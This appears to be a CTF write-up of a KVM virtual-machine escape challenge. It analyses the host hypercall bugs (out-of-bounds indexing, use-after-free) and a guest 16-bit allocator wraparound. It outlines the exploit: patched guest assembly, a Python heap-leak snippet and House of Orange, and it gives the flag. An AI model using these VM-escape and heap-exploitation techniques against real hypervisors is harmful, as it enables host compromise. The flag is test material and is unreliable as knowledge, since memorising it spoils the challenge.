                read(0, ((char *)run + run->io.data_offset), 1);
                continue;
            }

            fwrite("Unhandled IO\n", 1, 0xD, stderr);
            return 1;

        case KVM_EXIT_DEBUG:
            if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                puts("Error get regs!");

            /* check if VMCALL instruction */
            if (guest_memory[regs.rip] == 0xF && guest_memory[regs.rip + 1] == 1
                                        && guest_memory[regs.rip + 2] == 0xC1) {

                if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                    puts("Error get regs!");

                switch (regs.rax) {

                    case 0x101:
                        free_memory(regs.rbx, regs.rcx);
                        break;
                    case 0x102:
                        copy_memory(regs.rbx, regs.rcx, regs.rdx, guest_memory);
                        break;
                    case 0x100:
                        alloc_memory(regs.rbx);
                        break;
                    default:
                        puts("Function error!");
                        break;
                }
           }
           continue;
VM exits caused by port I/O (KVM_EXIT_IO) are handled to read and write data using stdin/stdout. Three interesting hypercalls are implemented on top of the KVM_EXIT_DEBUG event.

Host Bugs:

A. The array that manages host allocations and sizes can be accessed out of bounds by all 3 hypercalls (free_memory, copy_memory, alloc_memory). Below is the code from alloc_memory:
     /* index can take the value 16 here when going out of loop */
     for (index = 0; index <= 0xF && allocations[index]; ++index);

     mem = malloc(size);

     if (mem) {
         allocations[index] = mem;        // out of bounds access
         alloca_size[index] = size;       // can overwrite allocations[0]
         ++number_of_allocs;

This bug is less interesting for exploitation, since there is a use-after-free which gives better primitives.

B. The hypercall for freeing memory has an option to free a pointer without clearing the reference. However, the guest code only allows access to case 3.
        if (index <= 16) {               // out of bound access

                switch (choice) {

                        case 2:
                                free(allocations[index]);
                                allocations[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 3:
                                free(allocations[index]);
                                allocations[index] = 0;
                                alloca_size[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 1:
                                // double free/UAF as pointer is not set to NULL
                                free(allocations[index]);               
                                break;
                }
        } 
This UAF can be further exercised in the hypercall to copy memory between guest and host
    if (size <= alloca_size[index]) {
        if (choice == 1) {
            // write to freed memory due to UAF
            memcpy(allocations[index], guest_memory + 0x4000, size);        
        }
        else if (choice == 2) {
            // read from uninitialized or freed memory
            memcpy(guest_memory + 0x4000, allocations[index], size);        
        }
    } 
Guest Bug:

Though the host code has a UAF, this bug cannot be triggered using the guest code that is currently executing. Hence we need to achieve code execution in the guest before attempting a VM escape. The guest code starts at address 0. It initializes the stack pointer to 0x3000:
seg000:0000                 mov     sp, 3000h
seg000:0003                 call    main
seg000:0006                 hlt
The guest code to allocate memory in guest looks like below:
seg000:007E                 mov     ax, offset size_value
seg000:0081                 mov     bx, 2           ; get 2 byte size
seg000:0084                 call    inb
seg000:0087                 mov     ax, ds:size_value
seg000:008A                 cmp     ax, 1000h       ; check if size <= 0x1000
seg000:008D                 ja      short size_big
seg000:008F                 mov     cx, ds:total_bytes
seg000:0093                 cmp     cx, 0B000h
seg000:0097                 ja      short guest_mem_full
seg000:0099                 mov     si, word ptr ds:nalloc
seg000:009D                 cmp     si, 16          ; check the number of allocations made
seg000:00A0                 jnb     short too_many_allocs
seg000:00A2                 mov     di, cx
; move beyond stack@0x3000 and host shared_mem@0x4000, but this can wrap
seg000:00A4                 add     cx, 5000h       
seg000:00A8                 add     si, si
seg000:00AA                 mov     ds:address_array[si], cx ; save address
seg000:00AE                 mov     ds:size_array[si], ax ; save size
seg000:00B2                 add     di, ax
seg000:00B4                 mov     ds:total_bytes, di
seg000:00B8                 mov     al, ds:nalloc
seg000:00BB                 inc     al
seg000:00BD                 mov     ds:nalloc, al

The guest uses the following memory region:
text region  @ 0x0
stack bottom @ 0x3000
shared memory @ 0x4000
heap @ 0x5000 – 0x5000+0xB000
The guest memory allocator starts at address 0x5000 and limits the total number of bytes allocated to 0xB000. However, the addition total_bytes + 0x5000 can wrap around to 0 in 16-bit arithmetic (0xB000 + 0x5000 = 0x10000, which truncates to 0). The resulting allocation at address 0 allows the guest code to be overwritten with arbitrary code. Now the vulnerable hypercall paths in the host can be triggered from the guest.

Exploitation:

I didn’t overwrite the entire guest code, but extended its functionality with the following changes, which set bx to a user-supplied value before each vmcall:
seg000:0058 _free_memory:                           ; CODE XREF: main+2A↑j
seg000:0058                 call    get_choice
seg000:005B                 jmp     short loop
seg000:01A3                 call    set_choice
seg000:01A6                 mov     cl, ds:index    ; index
seg000:01AA                 mov     dx, ds:size_value
seg000:01AE                 vmcall
 
seg000:01DF                 mov     ax, 101h        ; free
seg000:01E2                 call    set_choice
seg000:01E5                 mov     cl, ds:index
seg000:01E9                 vmcall
seg000:0386 choice          dw 0                    ; DATA XREF: get_choice+B↓o
seg000:0386                                         ; set_choice↓r
seg000:0388
seg000:0388 get_choice      proc near               ; CODE XREF: main:_free_memory↑p
seg000:0388                 push    ax
seg000:0389                 push    bx
seg000:038A                 mov     ax, (offset aElcomeToTheVir+0B7h) ; 
seg000:038D                 mov     bx, 0Ch
seg000:0390                 call    outb
seg000:0393                 mov     ax, offset choice
seg000:0396                 mov     bx, 1
seg000:0399                 call    inb
seg000:039C                 pop     bx
seg000:039D                 pop     ax
seg000:039E                 retn
seg000:039E get_choice      endp
seg000:039E
seg000:039F set_choice      proc near               ; CODE XREF: update_host_memory+4C↑p
seg000:039F                                         ; free_host_memory+1F↑p
seg000:039F                 mov     bx, ds:choice
seg000:03A3                 retn
seg000:03A3 set_choice      endp
Leaking libc and heap pointers:

Since the freelist pointers of a freed unsorted chunk can be read through the UAF, this leaks arena and heap pointers. Allocate 4 chunks, free alternate chunks to prevent coalescing, and read the pointers using the UAF as below:
for x in range(4):
    allocate_host_memory(256)

free_host_memory(0, INVALID_FREE)
free_host_memory(2, VALID_FREE) 

copy_memory(256, 0, 'A'*256, COPY_FROM_HOST)
heap_mem = p.recvn(0x1000)
Getting code execution:

House of Orange works for this situation. Create a large chunk and free it, but hold reference to the pointer. Later use this reference to overwrite the top chunk to gain code execution. The flag in rwctf format was WoW_YoU_w1ll_B5_A_FFFutuRe_staR_In_vm_E5c4pe. The exploit for the challenge can be found here

References: Using the KVM API, House of Orange